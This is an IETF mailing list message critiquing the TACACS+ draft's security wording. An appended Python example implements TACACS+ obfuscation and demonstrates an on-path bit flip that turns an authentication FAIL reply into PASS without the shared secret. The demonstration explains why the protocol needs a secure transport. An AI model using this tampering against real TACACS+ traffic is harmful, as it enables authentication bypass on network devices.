On Jul 13, 2018, at 1:00 AM, Douglas Gash (dcmgash) <[email protected]> wrote:

> 9.5 Deployment Best Practices
>
> With respect to the observations about the security issues described above, a
> network administrator MUST NOT rely on the obfuscation of the TACACS+
> protocol and TACACS+ MUST be deployed over networks which ensure privacy and
> integrity of the communication. TACACS+ MUST be used within a secure
> deployment. Failure to do so may impact overall network security.
"may"? It's much stronger than that. Secrets will leak, people will be able to spoof credentials, etc. It *will* impact network security. Severely.

> The following recommendations are not part of the definition of the protocol.
> Rather, they impose restrictions on how the protocol is applied. Specific
> requirements of the TACACS+ server and TACACS+ client implementations are
> mandated to make it easier for the administrators who deploy TACACS+ to adopt
> the restrictions.

That last sentence is unclear to me. And mandates don't make it easier, they make it harder. But the mandates are necessary for security.

> Some of the specific requirements mandated for TACACS+ servers and TACACS+
> clients may not be present in currently deployed implementations. This is
> accepted as situational fact, and these implementations may still be regarded
> as correctly implementing the TACACS+ protocol as long as they conform to the
> details in other sections of this document.

The spec doesn't need to say "yes, all existing implementations are OK". This list has had long discussions on that topic, which I suspect was due to general unfamiliarity with the IETF process. I don't think it's necessary to put that statement in the document.

There have been many, many historical protocols documented in the IETF. None that I recall have a statement explicitly blessing existing implementations.

The document *should* say that it documents TACACS+ as per existing implementation and practice. BUT for security reasons, certain parts of the protocol and/or deployment practices are deprecated for security reasons.

> New implementations, and upgrades of current implementations, SHOULD
> implement the recommendations.

And that SHOULD means "you don't really need to adopt the recommendations". The spec needs to say "you MUST implement and deploy it in a secure manner".

Alan DeKok.
_______________________________________________
OPSAWG mailing list
[email protected]
https://www.ietf.org/mailman/listinfo/opsawg
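The exchange above turns on why the draft's "MUST NOT rely on the obfuscation" matters in practice. The following example is added here and is not code from the thread, the draft, or any TACACS+ implementation. It implements the TACACS+ body obfuscation as the specification describes it (MD5 keystream over session_id, shared secret, version and seq_no, XORed with the body; the algorithm later published as RFC 8907 section 4.5) and then shows the property Alan is pointing at: the obfuscation provides no integrity, so an on-path party who never learns the shared secret can rewrite an authentication REPLY from FAIL to PASS with a single XOR. The session id, secret, message text, and the `flip_status` and `integrity_tag` helpers are constructed for the example; the HMAC tag is not part of TACACS+ and only stands in for the integrity that a secure transport (the "networks which ensure privacy and integrity" the draft requires) would supply.

```python
import hashlib
import hmac
import struct

# Authentication REPLY status values from the TACACS+ specification.
AUTHEN_STATUS_PASS = 0x01
AUTHEN_STATUS_FAIL = 0x02


def pseudo_pad(session_id: int, key: bytes, version: int, seq_no: int, length: int) -> bytes:
    """Keystream per the spec: MD5_1 = MD5(session_id|key|version|seq_no),
    MD5_n = MD5(session_id|key|version|seq_no|MD5_{n-1}), truncated to length."""
    prefix = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, prev = b"", b""
    while len(pad) < length:
        prev = hashlib.md5(prefix + prev).digest()
        pad += prev
    return pad[:length]


def obfuscate(body: bytes, session_id: int, key: bytes, version: int, seq_no: int) -> bytes:
    """XOR the body with the pseudo pad. XOR is its own inverse, so the same
    call de-obfuscates a received body."""
    pad = pseudo_pad(session_id, key, version, seq_no, len(body))
    return bytes(b ^ p for b, p in zip(body, pad))


def authen_reply(status: int, server_msg: bytes = b"", data: bytes = b"") -> bytes:
    """Authentication REPLY body: status(1) flags(1) server_msg_len(2) data_len(2) + payloads."""
    return struct.pack("!BBHH", status, 0, len(server_msg), len(data)) + server_msg + data


def flip_status(obfuscated_body: bytes, from_status: int, to_status: int) -> bytes:
    """Constructed on-path tampering that needs no knowledge of the secret:
    XOR the first ciphertext byte with the difference of the two plaintext
    status values. Every other byte is left untouched."""
    return bytes([obfuscated_body[0] ^ (from_status ^ to_status)]) + obfuscated_body[1:]


def integrity_tag(key: bytes, body: bytes) -> bytes:
    """Illustrative only: an HMAC over the wire body, standing in for the
    integrity a secure transport provides. Not part of TACACS+."""
    return hmac.new(key, body, hashlib.sha256).digest()


def verify_tag(key: bytes, body: bytes, tag: bytes) -> bool:
    return hmac.compare_digest(integrity_tag(key, body), tag)


def demo() -> dict:
    session_id = 0x1A2B3C4D              # constructed session id
    key = b"example-shared-secret"       # constructed secret; the attacker never sees it
    version, seq_no = 0xC0, 2            # major version 0xc, minor 0; seq_no 2 is the first server reply

    # Server sends an authentication failure.
    plain = authen_reply(AUTHEN_STATUS_FAIL, b"Authentication failed")
    wire = obfuscate(plain, session_id, key, version, seq_no)
    tag = integrity_tag(key, wire)

    # On-path party flips FAIL -> PASS without the key.
    tampered = flip_status(wire, AUTHEN_STATUS_FAIL, AUTHEN_STATUS_PASS)

    # Client de-obfuscates with the real key and accepts what it sees.
    seen_by_client = obfuscate(tampered, session_id, key, version, seq_no)

    return {
        "original_status": plain[0],
        "status_seen_by_client": seen_by_client[0],
        "rest_of_body_unchanged": seen_by_client[1:] == plain[1:],
        "tag_ok_original": verify_tag(key, wire, tag),
        "tag_ok_tampered": verify_tag(key, tampered, tag),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The status byte sits at a fixed offset in every REPLY, so the attacker needs neither the secret nor the keystream, only the protocol layout. The obfuscation hides the bytes but does not bind them; only an authenticated transport (or, as in the constructed `integrity_tag` check, a keyed MAC the attacker cannot recompute) detects the change.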
